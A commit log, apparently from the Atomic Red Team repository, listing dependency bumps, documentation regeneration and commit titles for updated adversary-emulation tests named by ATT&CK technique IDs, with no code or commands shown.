dependabot[bot]	4009c7d083	Bump typer from 0.21.1 to 0.23.1 (#3283 ) Signed-off-by: dependabot[bot] <support@github.com> Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com> Co-authored-by: Bhavin Patel <bhavin.j.patel91@gmail.com>	2026-02-23 09:56:15 +05:30
philhagen-rc	cf61e99289	update slack link (#3288 )	2026-02-19 18:43:39 -05:00
Atomic Red Team doc generator	9f6a1eab36	Generated docs from job=generate-docs branch=master [ci skip]	2026-02-18 16:55:45 +00:00
philhagen-rc	0b57340866	Template fix part2 (#3286 )	2026-02-18 11:54:46 -05:00
Atomic Red Team doc generator	376bf2a64d	Generated docs from job=generate-docs branch=master [ci skip]	2026-02-18 16:46:29 +00:00
philhagen-rc	78bbf833fb	second phase of template fix (#3285 )	2026-02-18 11:45:22 -05:00
philhagen-rc	eee9292a81	Update atomic_doc_template.md.erb (#3281 )	2026-02-18 09:50:28 -05:00
Atomic Red Team doc generator	e17202c34c	Generated docs from job=generate-docs branch=master [ci skip]	2026-02-13 02:45:07 +00:00
kfallahi	02e4420bc0	Update T1003.003.md & T1003.003.yaml via UnderlayCopy (#3217 )	2026-02-12 21:44:07 -05:00
Atomic Red Team doc generator	de509cf6b3	Generated docs from job=generate-docs branch=master [ci skip]	2026-02-13 02:35:27 +00:00
Brian	7c79132a29	Update T1176.yaml (#3282 ) Co-authored-by: Hare Sudhan <code@0x6c.dev>	2026-02-12 21:34:28 -05:00
dependabot[bot]	ca7ea83e01	Bump hypothesis from 6.148.7 to 6.151.5 (#3280 ) Signed-off-by: dependabot[bot] <support@github.com> Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>	2026-02-12 21:27:24 -05:00
dependabot[bot]	d93c5cf8f5	Bump typer from 0.21.0 to 0.21.1 (#3270 ) Signed-off-by: dependabot[bot] <support@github.com> Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>	2026-02-07 05:25:58 -05:00
Atomic Red Team doc generator	a1e6fd5454	Generated docs from job=generate-docs branch=master [ci skip]	2026-01-20 03:23:51 +00:00
Wai Linn Oo	7fff22ab93	Enhance T1546.018 (Hooking via Python) with site-packages and venv Isolation (#3274 ) Co-authored-by: Bhavin Patel <bhavin.j.patel91@gmail.com>	2026-01-20 08:52:50 +05:30
dependabot[bot]	2c5a063d34	Bump jsonschema from 4.25.1 to 4.26.0 (#3272 ) Signed-off-by: dependabot[bot] <support@github.com> Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com> Co-authored-by: Bhavin Patel <bhavin.j.patel91@gmail.com>	2026-01-19 11:05:36 +05:30
Atomic Red Team doc generator	4d228c6c24	Generated docs from job=generate-docs branch=master [ci skip]	2026-01-19 05:29:49 +00:00
Vladan Sekulic	fbb29b6cac	Enhance T1496(Resource Hijacking): Add Windows CPU Load Simulation (#3275 )	2026-01-19 10:58:26 +05:30
dependabot[bot]	65e7aa7bf7	Bump urllib3 from 2.6.0 to 2.6.3 (#3268 ) Signed-off-by: dependabot[bot] <support@github.com> Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>	2026-01-09 13:09:52 -05:00
Atomic Red Team doc generator	bd1debb014	Generated docs from job=generate-docs branch=master [ci skip]	2026-01-07 16:05:24 +00:00
Wai Linn Oo	c14d21f7bd	T1546.018 YML file update the code for Linux Test (#3266 )	2026-01-07 21:34:26 +05:30
Atomic Red Team doc generator	04fea5a5fc	Generated docs from job=generate-docs branch=master [ci skip]	2026-01-07 12:51:40 +00:00
Wai Linn Oo	9ee4c5c6a6	T1546.018 - Event Triggered Execution: Python Startup Hooks (#3265 ) Co-authored-by: Wai Linn Oo <wai.lo@Wais-MacBook-Pro.local>	2026-01-07 18:20:41 +05:30
Atomic Red Team doc generator	b5b2cd986b	Generated docs from job=generate-docs branch=master [ci skip]	2026-01-07 07:31:13 +00:00
cyb3rjy0t	256876632c	Update T1490 to include Diskshadow.exe test (#3253 ) Co-authored-by: Bhavin Patel <bhavin.j.patel91@gmail.com> Co-authored-by: Copilot <175728472+Copilot@users.noreply.github.com>	2026-01-07 13:00:15 +05:30
Vladan Sekulic	1c4e47d467	Update T1003.007 dump_heap.py: refactor FreeBSD heap memory dumping logic (#3231 ) Co-authored-by: Bhavin Patel <bhavin.j.patel91@gmail.com>	2026-01-06 17:20:04 +05:30
Atomic Red Team doc generator	64b1d2667b	Generated docs from job=generate-docs branch=master [ci skip]	2026-01-06 11:47:41 +00:00
Vladan Sekulic	a5d2c7f122	Update T1113 to add a RDP Bitmap Cache Extraction test (#3256 ) Co-authored-by: Hare Sudhan <code@0x6c.dev> Co-authored-by: Bhavin Patel <bhavin.j.patel91@gmail.com>	2026-01-06 17:16:38 +05:30
dependabot[bot]	f4a93ac212	Bump typer from 0.20.0 to 0.21.0 (#3261 ) Signed-off-by: dependabot[bot] <support@github.com> Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>	2026-01-06 17:12:08 +05:30
dependabot[bot]	712d69c359	Bump actions/upload-artifact from 5 to 6 (#3257 )	2025-12-18 03:10:27 -05:00
dependabot[bot]	c173f44a0c	Bump urllib3 from 2.5.0 to 2.6.0 (#3251 ) Signed-off-by: dependabot[bot] <support@github.com> Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com> Co-authored-by: Hare Sudhan <code@0x6c.dev>	2025-12-13 00:26:25 -05:00
Atomic Red Team doc generator	70e8efd512	Generated docs from job=generate-docs branch=master [ci skip]	2025-12-13 04:55:41 +00:00
Vladan Sekulic	4f16386fc7	Update T1652 to add device driver discovery commands for Linux and macOS (#3252 ) Co-authored-by: Hare Sudhan <code@0x6c.dev>	2025-12-12 23:54:48 -05:00
dependabot[bot]	c62a9819ad	Bump pytest from 9.0.1 to 9.0.2 (#3255 ) Signed-off-by: dependabot[bot] <support@github.com> Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>	2025-12-12 23:50:11 -05:00
dependabot[bot]	3f2beabd01	Bump pydantic from 2.12.4 to 2.12.5 (#3249 ) Signed-off-by: dependabot[bot] <support@github.com> Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>	2025-12-12 23:12:52 -05:00
dependabot[bot]	88f5b507d1	Bump hypothesis from 6.148.2 to 6.148.7 (#3254 ) Signed-off-by: dependabot[bot] <support@github.com> Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>	2025-12-12 23:09:13 -05:00
Atomic Red Team doc generator	0de6af53a1	Generated docs from job=generate-docs branch=master [ci skip]	2025-11-29 04:49:25 +00:00
Vladan Sekulic	79ff2fac43	Update T1007 to enhance service discovery methods across platforms (#3229 ) Co-authored-by: Hare Sudhan <code@0x6c.dev>	2025-11-28 23:48:27 -05:00
Atomic Red Team doc generator	7d0948382d	Generated docs from job=generate-docs branch=master [ci skip]	2025-11-29 04:39:36 +00:00
hfz	e71c0c3b57	Fix formatting issues in T1562.003.md (#3236 ) Co-authored-by: Hare Sudhan <code@0x6c.dev>	2025-11-28 23:38:40 -05:00
Atomic Red Team doc generator	6e5582f7a6	Generated docs from job=generate-docs branch=master [ci skip]	2025-11-29 04:34:19 +00:00
Vladan Sekulic	07a88142a7	Update T1049 atomics with process aware and cross platform network discovery (#3237 ) Co-authored-by: Hare Sudhan <code@0x6c.dev>	2025-11-28 23:33:21 -05:00
dependabot[bot]	79a3602930	Bump pydantic from 2.12.3 to 2.12.4 (#3226 ) Signed-off-by: dependabot[bot] <support@github.com> Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>	2025-11-28 21:40:02 -05:00